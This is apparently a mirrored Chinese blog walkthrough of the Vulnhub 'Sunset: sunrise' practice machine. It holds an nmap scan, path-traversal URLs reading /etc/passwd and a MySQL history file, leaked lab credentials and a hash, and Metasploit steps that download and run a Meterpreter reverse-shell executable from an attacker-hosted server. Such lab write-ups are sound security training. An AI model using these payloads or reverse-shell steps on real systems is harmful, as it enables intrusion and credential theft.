zoukankan      html  css  js  c++  java
  • Sunset靶机

    仅供个人娱乐

    靶机信息

    https://www.vulnhub.com/entry/sunset-sunrise,406/

    一、主机探测

    二、信息收集

    nmap -sS -sV -T5 -A -p-

    http://192.168.174.132:8080/

    三、漏洞利用

    构造poc

    http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

    http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2f

    http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f

    http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt

    http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.mysql_history

    weborf/iheartrainbows44

    sunrise    thefutureissobrightigottawearshades

    root          *C7B6683EEB8FF8329D8390574FAA04DD04B87C58

    以root执行wine命令,wine可以执行exe程序

    msfpc windows 192.168.174.128

    python -m SimpleHTTPServer 8888

    use exploit/multi/handler

    set encoder x86/shikata_ga_nai

    set lhost 192.168.174.132

    set lport 443

    run

    wget http://192.168.174.128:8888/windows-meterpreter-staged-reverse-tcp-443.exe



  • 相关阅读:
    pandas中的时间序列基础
    Python中的进程
    Pandas透视表和交叉表
    Pandas分组级运算和转换
    Python中的线程详解
    Pandas聚合
    Python面试题整理
    Pandas分组
    暑假集训 || 动态规划
    DFS || HDU 2181
  • 原文地址:https://www.cnblogs.com/bingtang123/p/13298814.html
Copyright © 2011-2022 走看看